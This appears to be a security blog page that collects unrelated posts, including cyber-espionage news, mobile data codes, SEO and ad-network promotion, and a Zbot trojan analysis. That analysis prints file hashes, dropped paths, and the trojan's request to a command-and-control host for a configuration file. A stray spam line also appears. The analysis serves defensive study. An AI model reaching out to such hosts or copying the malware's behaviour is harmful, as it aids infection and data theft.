Chinese Hackers Attack Indian Websites

The people who uncovered GhostNet have found a completely separate hacking network that mainly targeted the Indian government. The “Shadow Network”, as this network is now known, has been traced to two people living in Chengdu, China.

China is largely believed to possess a Cyber Warfare Doctrine that is designed to achieve global “electronic dominance” by 2050. With a yearly budget of $55 million allotted for it and over 10,000 hackers working in tandem, China is second only to U.S. when it comes to cyber snooping prowess.

Chinese hackers compromised computers using malware that traveled as Microsoft Office or PDF files, and used relatively well-known exploits. Once on a machine, however, the malware would communicate with a specific Yahoo Mail account, which allowed it to receive more sophisticated software via attachments, and alert the network to its identity.

moonwalker download full film

The command-and-control network operated primarily through free webhosting services, many of them operating from within the US. As these systems came and went, various social networking services—Google and Baidu blogs, Twitter, etc.—were used to supply the infected systems with a list of alternate hosts. Fortunately for the researchers, at times when a lot of the free webhosts were taken out of action, the social networking updates revealed a core of servers that remained constant; these were exclusively hosted within China.

It seems that the upcoming Commonwealth games in India is one of the primary targets. Ticket sales, and online registration servers have been compromised. The hackers had also looked into tender documents for the Commonwealth games network infrastructure.

It also seems that the hackers have laid their hands on information on missile systems being developed by India, a list of visas issued by Indian embassies and other sensitive information.

This is not the first time India was under from these Chinese hackers. In 2008 and 2009 too, there were a number of small attacks on computers of the Indian Ministry of External Affairs. As many as 450 computers belonging to the India Government – including that of the then National Security Adviser (NSA) M.K. Narayanan and Deputy NSA Shekhar Dutt and the chiefs of the navy, army and air force besides officials in the defense intelligence agencies were infected.

Activate And Use BSNL GPRS Portal For Free

BSNL give free GPRS access to CellOne.in portal. Surfing is free, downloads are charged.So if you download themes ,wallpaper or ringtones etc you will be charged for it.


There is link for ‘Free Content’ section.


So In order to activate and use bsnl gprs free from your phone follow the steps acording to your connection type.


1. TO ACTIVATE BSNL PORTAL
GO TO SEND MESSAGE OPTION AND TYPE “PORTAL TO 3733“(without quotes).


2. FOR ACTIVATE BSNL PORTAL PREPAID GPRS(2PAISA PER KB)
GO TO SEND MESSAGE OPTION AND TYPE “gprspre TO 3733“(without quotes).


3. FOR GPRS 49 PLAN
GO TO SEND MESSAGE OPTION AND TYPE “gprs49 TO 3733“(without quotes).


4. FOR GPRS 199 PLAN
GO TO SEND MESSAGE OPTION AND TYPE “gprs199 TO 3733“(without quotes).


 bsnl grps settings ,bsnl gprs activate ,bsnl gprs

Sony PS3 Updated To Firmware 3.56

 A new PS3 update has gone live. It is a mandatory update so you will see it if you log on now. It is a security patch for the PS3. 
 “a minor update that adds a security patch.”  It’ll be interesting to see if this plugs any holes that hackers have created in the PS3′s armor but rumors  that the encryption key for the new firmware is already out there and available to wily pirates, OOOF....

EasyHits4U Traffic Exchange

Their system is designed to help you promote your site by increasing the number of visitors that actually view your site.

How it works: For every site you visit , you will receive one visitor back to your site. They provide a fair 1:1 Exchange Ratio. There's no limit to the amount of free hits you can receive per day — 10, 100, or even 1000!

PLUS $0.3 per 1000 surfs

also they reward you with cash and additional traffic for being active in our traffic exchange

Analysis of Trojan-Spy.Win32.Zbot

Analysis Content: Trojan-Spy.Win32.Zbot – Analysis of Malware
Released: 16.11.2008
Author of Analysis: Robert
Contact: robert@novirusthanks.org
Website: http://novirusthanks.org

My friend Steve sent to me some days ago a Trojan-Spy.Win32.Zbot sample and below there is the analysis:
The file I received was named live.exe

and below there is the report of the scan of the file:

Report Generated 17.11.2008 at 12.25.44 (GMT 1)
Time for scan: 23 seconds
Filename: live.exe
File size: 67 KB
MD5 Hash: A785276189E5387AF4C13536CFC76E65
SHA1 Hash: 31E1392EB9793EEDBA74038FBC0AF31382F91B73
CRC32: 2777692707
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
ASCII Strings: View
Detection Rate: 18 on 23

Antivirus Result
a-squared Trojan-Spy.Win32.Zbot.gbr!IK
Avira AntiVir TR/Spy.ZBot.Dro.2
Avast Win32:Downloader-CAT [Trj] (0)
AVG Trojan horse Pakes.ALW
BitDefender Trojan.Spy.Wsnpoem.LE
ClamAV Trojan.Invo-4
Comodo Nothing found!
Dr.Web Trojan.PWS.Panda.31
Ewido Nothing found!
F-PROT 6 Nothing found!
G DATA Trojan-Spy.Win32.Zbot.gbr A
IkarusT3 Trojan-Spy.Win32.Zbot.gbr
Kaspersky Trojan-Spy.Win32.Zbot.gbr
McAfee Spy-Agent.bw trojan
NOD32 v3 Win32/Spy.Agent.NKC trojan
Norman Trojan W32/Banker.DWVI ()
Panda Nothing found!
QuickHeal TrojanSpy.Zbot.gbr
Solo Antivirus Infection Trojan.Spy.Win32.Zbot.Gbr
Sophos Mal/EncPk-CZ
TrendMicro Nothing found!
VBA32 Trojan-Spy.Win32.Zbot.gbr
VirusBuster TrojanSpy.ZBot.Gen!Pac.5

PE Import Tables:

kernel32.dll
+OpenFileMappingA
+DeleteFileA
+DeleteFileW
+GetLastError
+ExitThread
+DeleteAtom
+GetCPInfo
+GetComputerNameA
+GetFileSize
+GetStdHandle
+ReadFile
+GlobalFree
+WriteFile
+GetCommandLineA
+CreateProcessA
+Sleep
+GetConsoleMode
+CreateThread
+FindAtomA
kernel32.dll
+ExitThread
+GlobalFree
+CopyFileExW
+CopyFileW
+GetFileSize
+ReadFile
+GetFileTime
+DeleteFileW
+FindFirstFileA
+GetCommandLineA
+GetStdHandle
+CreateDirectoryA
+OpenFile
+SetLastError
+DeleteAtom
+GetConsoleMode
user32.dll
+IsMenu
+InsertMenuA
+DrawTextW
+GetWindowTextLengthA
+AppendMenuW
+DialogBoxParamW
+GetFocus
+GetWindowTextA
+GetDlgItem
+GetCursor
+CopyIcon
+EndDialog
+CalcMenuBar
+CreateIcon
+BlockInput
+GetMenu
+GetDC
+DrawIconEx
+CloseWindow
+AlignRects
+IsWindow
+DialogBoxParamA
+LoadCursorA
+CopyImage
user32.dll
+CreateIcon
+GetFocus
+BlockInput
+InsertMenuA
+EndDialog
+DrawTextA
+AlignRects
+GetWindowTextLengthA
+IsWindow
+CloseWindow
+CopyImage
+GetDlgItem
+AppendMenuW
+LoadCursorA
+LoadMenuA
+DrawIcon
+CopyIcon
+GetDC
+GetMenu
+DrawIconEx
+GetCursor
+DialogBoxParamW
+CopyRect
kernel32.dll
+GetConsoleMode
+GetCPInfo
+ExitThread
+GetComputerNameA
+GetStdHandle
+ReadFile
+CreateProcessA
+CreateThread
+SetLastError
+CreateDirectoryA
+DeleteAtom
+WriteFile
+Sleep
+CopyFileW
+GetFileSize
+GetFileTime
+CopyFileExW
comctl32.dll
+ImageList_DragLeave
+ImageList_GetIcon
comctl32.dll
+ImageList_Copy
comctl32.dll
+ImageList_Merge
advapi32.dll
+RegCreateKeyW

When I started this .EXE some files was copyed in C:\WINDOWS\system32\ and below there is the list:

C:\WINDOWS\system32\twext.exe
C:\WINDOWS\system32\twain_32
C:\WINDOWS\system32\twain_32\local.ds
C:\WINDOWS\system32\twain_32\user.ds
C:\Documents and Settings\NetworkService\Application Data\twain_32
C:\Documents and Settings\NetworkService\Application Data\twain_32\user.ds
C:\Documents and Settings\LocalService\Application Data\twain_32
C:\Documents and Settings\LocalService\Application Data\twain_32\user.ds

Below there is the report of the scan of the file twext.exe:

Report Generated 17.11.2008 at 12.47.07 (GMT 1)
Time for scan: 23 seconds
Filename: twext.exe
File size: 244 KB
MD5 Hash: 1C6A2494488D455757B8B69CF499C6A0
SHA1 Hash: 27CFCD52F3AADC153976AFB12AFDB7AEC1CFF043
CRC32: 288333931
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found [Overlay] *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
ASCII Strings: View
Detection Rate: 16 on 23

Antivirus Result
a-squared Trojan-Spy.Win32.Zbot.gbr!IK
Avira AntiVir TR/Spy.ZBot.Dro.2
Avast Win32:Downloader-CAT [Trj] (0)
AVG Trojan horse Pakes.ALW
BitDefender Trojan.Spy.Wsnpoem.LE
ClamAV Trojan.Invo-4
Comodo Nothing found!
Dr.Web Trojan.PWS.Panda.31
Ewido Nothing found!
F-PROT 6 W32/Trojan3.HR (exact)
G DATA Trojan-Spy.Win32.Zbot.gbr A
IkarusT3 Trojan-Spy.Win32.Zbot.gbr
Kaspersky Trojan-Spy.Win32.Zbot.gbr
McAfee Nothing found!
NOD32 v3 Win32/Spy.Agent.NKC trojan
Norman Trojan W32/Banker.DWVI ()
Panda Nothing found!
QuickHeal TrojanSpy.Zbot.gbr
Solo Antivirus Nothing found!
Sophos Mal/EncPk-CZ
TrendMicro Nothing found!
VBA32 Trojan-Spy.Win32.Zbot.gbr
VirusBuster Nothing found!

The files located in C:\WINDOWS\system32\ were Hidden from Explorer search as shown in image below:


Below there is an image of the encrypted content of the file user.ds:

The file C:\WINDOWS\system32\twext.exe was injected in the processwinlogon.exe and started to send traffic to this host:

==================================================
Index : 4
Protocol : TCP
Local Address : 192.168.1.4
Remote Address : 91.203.93.29
Local Port : 1039
Remote Port : 80
Local Host :
Remote Host :
Service Name : http
Packets : 10
Data Size : 828 Bytes
Total Size : 1.403 Bytes
Capture Time : 17/11/2008 12.21.31:078
==================================================

GET /fidel/conf.bin HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: ddtfff.ru
Pragma: no-cache

HTTP/1.1 404 Not Found
Date: Mon, 17 Nov 2008 18:53:05 GMT
Server: Apache/2
Content-Length: 392
Connection: close
Content-Type: text/html; charset=iso-8859-1

But unfortunately the file GET /fidel/conf.bin HTTP/1.0 that the malware try to download every X number of time

does not exist anymore and i cannot analyze it.
Below there is a small summary of this malware activity:


source: http://blog.novirusthanks.org/2008/11/trojan-spywin32zbot-analysis-of-malware/

New Anti-analysis Technique for Script Malware

Recently, we came across JS_VIRTOOL which uses certain Javascript techniques so that encrypted code may not be decrypted and analyzed by a malware analyst.
Here is how this is done:

1. It retrieves the URL where the malicious script is located.
2. It retrieves its own function and adds the string of the URL.
3. It computes the CRC of the function plus the URL.
4. It decrypts an encrypted code in the script body using the CRC that was computed.
5. It executes the decrypted code using the eval() function.

Figure 1. Obfuscated code of JS_VIRTOOL

It uses its function and URL location as a decryption code. In this case, the encrypted code which is the real routine of the malware will not execute if the function is tampered and/or the URL is not correct.
If a malware analyst only has the script file sample without knowing where the file was downloaded from, he will not be able to know the malware’s actual routines since the URL is necessary for the decryption to take place. In addition, if this script is placed on another website aside from the “correct” one, it will not be successfully decrypted.
Currently, we have multiple samples that all use this particular technique, but have different encrypted contents. We suspect that they have the same decrypted data, the only difference being the URL location which will decrypt each sample. We believe that this as a technique which is intended to make it more difficult to track the source and cause of infection. This could potentially increase the time before these malicious scripts are detected and the appropriate solutions are released to users.

Black Hat Skills to Make Money Online

What skills do you need to make money online using Black Hat SEO?
There may be overlap between some of the skills in the list below, but if you have all of these in your toolbox, you have the potential to become a successful Black Hat SEO:
Technical skills:

• Planning
• Organization
• Finance
• System modelling
• Reverse engineering
• Analytical
• Logical
• Creative

Life skills:

• Self confidence
• Skepticism
• Curiosity
• Ingenuity
• Stubbornness
• Generosity
• Iron proof work ethics

I’ll follow up this post describing each of these skills and the role they play in your money making ventures.

Black Hat SEO Vs White Hat SEO

As the earning opportunity of optimized websites are increasing daily, search engine marketing tactics has turn out to be an essential industry these days. There are so many methods of search engine marketing and not all of them are legal. Some people, who want to get great income in a short term, resort to dishonest methods which are often known as Black Hat Search engine optimization. The great old seo link buildingmethods that bring success in long run and have more durable outcomes are called as White Hat Search engine optimization. As some people are following these black hat methods, it becomes difficult for those who take straight forward routes, to obtain a great page rank even after sincere initiatives.
Black Hat Search engine optimization methods shatter the philosophy of search engines. They’re spammers who do not offer real content in their web site. They just contain some keywords and no useful and informative content that would really worth obtaining a great web page rank. But they have the ability to come up in the ladder within the search result pages from the search engines and could taste the fruits even although they don’t deserve it. Many genuine websites lose their income because of them.
Some from the black hat Search engine optimization techniques are,
-Keyword Stuffing
-Creating Doorway pages
-Blog Spamming
-Web page cloaking
-Using hits Generators
-Making their pages refresh instantly to improve web page impressions.
If these are discovered out by Google, it will penalize the site and might even ban them.
White Hat Search engine optimization techniques are the organic or natural methods of obtaining a great web page rank you the web site. They follow the rules and regulations strictly. They’re loved by search engines as they contain high quality content and could offer dependable outcomes. The typical White Hat Search engine optimization techniques are,
-Getting high quality one way links
-Frequent updations
-Writing blogs associated with their industry
-Link building through article submissions with the help of a link building service
-Originality
These methods are well-liked by search engines. Although it takes lot of time to implement them, the outcomes will last longer than black hat methods.
There are some methods that fall midway between black hat and white hat technique. They’re recognized as Grey Area Search engine optimization. Content material scraping is an example for this. In this method, search engine outcomes and descriptions are captured by the software and are added to the web page as content. Although this method is allowed at the moment by Google, it might get banned anytime when it becomes more and more abused.

Best adsense alternatives to earn money from your website and blog

Getting banned from adsense is  very common now a days. Though there are many networks present in the market, I am listing below some of the best alternatives to adsense. .


Adbrite:-
  +ve: 

• Adbrite is considered to be one of the best alternative to adsense and it is my favorite site. 
• They even accept adult sites.
• Many option to choose from like fullpage ads, text, banner, invideo, inline ads.
• Can run along with adsense as long as you maintain a different look-and-feel.
• Minimum Payment $5.00

  -ve: 

•  You need to be patient since it takes time to fill up your ad inventory.

                                      Click here to signup to adbrite

 Bidvertiser:-

 +ve: 

• Works very well on making-money-online and webmasters type of sites.
• Can run along with adsense as long as you maintain a different look-and-feel.
• Minimum Payment $10 via paypal.

  -ve: 

• The complain I hear most often this network is that they don't often enough ad inventory for other types of sites.

 Chitika:-

 +ve: 

• The ads are contextual by default
• Ads can be set to non -contextual and can be targeted to specific keywords
• Can run along with adsense
• Min Payment $10 via paypal and $50 by check.

 -ve: 

• US, UK and Australia traffic is preferred. 

Clicksor:-
  +ve: 

• Online demo clearly illustrates how the contextual and keyword hover techniques work.
• Campaigns are normally begun within approximately 24 hours of submission of your keywords.
• Campaigns can be terminated at any time with full return of unused account balance, but a written request for termination is required.
• Payment option of PayPal, which makes it popular with international websites.

   -ve: 

• English-only ads accepted
• Ads appear to load very slowly which may deter visitors from waiting until the page is fully loaded.
• Although some users are uncertain if affiliates of Clicksor can also use Google (due to code needed to be inserted in page violating Google's TOS), others claim to have had no problem with having both programs running at the same time.
• Apparent concentration on benefits of affiliate program over actual PPC products.

BackLinks:-

+ve: 

• Make money selling test link ads
• Prices starts from $0.50 per link per month to $75 perlink per month
• Nice way to earn since it works with ppc
• Minimum payout is $10 via paypal

  -ve: 

•  Site should have at least page rank 1 to earn good money 

Study shows most antivirus software misses hacker exploits half the time.

A majority of security software suites still fail to detect attacks on PCs even after the style of attack has been known for some time, underscoring how hackers still have the upper hand.
NSS Labs, which conducts tests of security software suites, tested how security packages from 10 major companies detect so-called "client-side exploits." In such incidents a hacker attacks a vulnerability in software such as web browsers, browser plug-ins or desktop applications such as Adobe Acrobat and Flash.
NSS Labs is an independent security software company that unlike many other testing companies does not accept vendor money for performing comparative evaluations. Vendors are notified, however, and are allowed to make some configuration changes before NSS Labs' evaluation.

"This test - the first of its kind in the industry - was designed to identify how effective the most popular corporate endpoint products are at protecting against exploits," according to the report. "All of the vulnerabilities exploited during this test had been publicly available for months (if not years) prior to the test, and had also been observed in real attacks on real companies."
The attacks are often done by tricking a user into visiting a hostile Web site that delivers an exploit, or a specially crafted code sequence that unlocks a vulnerability in a software application, according to the NSS Labs report.
There can be different variants of exploits that attack the same vulnerability but target different parts of a computer's memory. Security vendors frequently add signatures to their databases that enable the software to detect specific exploits, but those exploits may evolve.
"A vendor may develop a signature for the initial exploit with the intent to later deliver subsequent signatures," the report said. "Our testing has revealed that most vendors do not take these important additional steps."
Only one of the 10 software suites tested detected all 123 exploits and variants, which were designed to attack vulnerabilities in software such as Microsoft's Internet Explorer browser, Firefox, Adobe Acrobat, Apple's QuickTime and others.
The 10 software suites scored vastly different, with one catching all of the exploits at the top end and 29 percent at the low end.
NSS Labs said the average protective score was 76 percent among the 10 suites for "original exploits," or the first exploit to be made publicly against a particular software vulnerability. Three of the 10 caught all original exploits. For variant exploits, the average protective score was 58 percent.
"Based on market share, between 70 to 75 percent of the market is under protected," the report said. "Keeping antivirus software up-to-date does not yield adequate protection against exploits, as evidence by coverage gaps for vulnerabilities several years old."
NSS Labs president, Rick Moy, said all of the vulnerabilities are "low-hanging fruit." Information on the vulnerabilities has been available in some cases since 2006, which means the hackers all know the problems and the exploits are still being used.
But security software companies have tended to focus on the malicious software delivered after an exploit. Those samples number in the millions now. However, the number of exploits are much, much less numerous and would be a better choke point to protect computers.
Patching the known vulnerabilities will also stop the exploits, but many companies won't apply all patches immediately since it may break other software those companies are using, Moy said. Security software represents a good "virtual patch," but only if it can detect those exploits and subsequent malware, he said.
NSS Labs puts the suites in three categories: "recommend," which means a product performed well and should be used in an enterprise; "neutral," which means a product performed reasonably well and should continued to be used if it is already in use; and "caution," which means the product had poor test results and organisations using it should review their security posture.

User names and passwords of 1.3 million stolen in weekend Gawker Media hack

Hackers broke into servers belonging to Gawker Media over the weekend, causing mischief and making off with more than 1.3 million user names and passwords. The account belongs to users who have commented on websites run by the company, ranging from the flagship Gawker to highly trafficked websites such as Gizmodo and Lifehacker.

In a virtual slap across the face, the hackers, who used the name "Gnosis," published an article on Gawker that linked to the source code of the site as well as the 487MB file containing details of the compromised accounts. While the data is encrypted via MD5 hash, "simple ones may be vulnerable to a brute-force attack" noted Gawker Media in a statement that also urged users to change their passwords.

Elsewhere, various media outlets and bloggers are digging into the most popular passwords that are in use. On this front, The Wall Street Journal has a detailed article on The Top 50 Gawker Media Passwords. As expected, the need to use different passwords for different sites is also a topic that is reiterated across the web, with dedicated password tools recommended to maintain them.

Beyond the obvious embarrassment and security implications of the stolen account details however, the biggest repercussion is a long-time one for Gawker. In a purported interview with members of Gnosis, one of the hackers bragged about how a site like Gawker with its large code base means that it is stuck with running what is in effect public code until a new private version can be released--something which will take a long time. In the meantime, the hacker noted that "anyone can view how it works, meaning exploits can be found for the code."

For more on this story:
- check out this article at New York Times
- check out this article at Computerworld
- check out this article at The Wall Street Journal
- check out this article at Geekosystem

Note For readers ,Please read...

Hi, welcome to BGRF Blog, this blog contains posts about various security related topics such as Exploits, Malwares and other security threats,antivirus,firewalls and also dedicated section for default Port numbers and passwords of many products, etc to help you guys to get a better idea about computer security.

Notes For New Users ( Must Read) :-

1.This Blog is not for beginners as it may contain posts which are some what difficult to understand [for beginners we are planning to create a separate section soon] so don't post comments asking what does all about, etc.


2.This Blog is completely legal and it does not encourage illegal activities such as hacking.


3.Please don't Flame the authors (all comments are monitored)

4.If you interested to post or say something you can contact me by using the contact link.

                                                                                            -Thank you
                                                                                              Black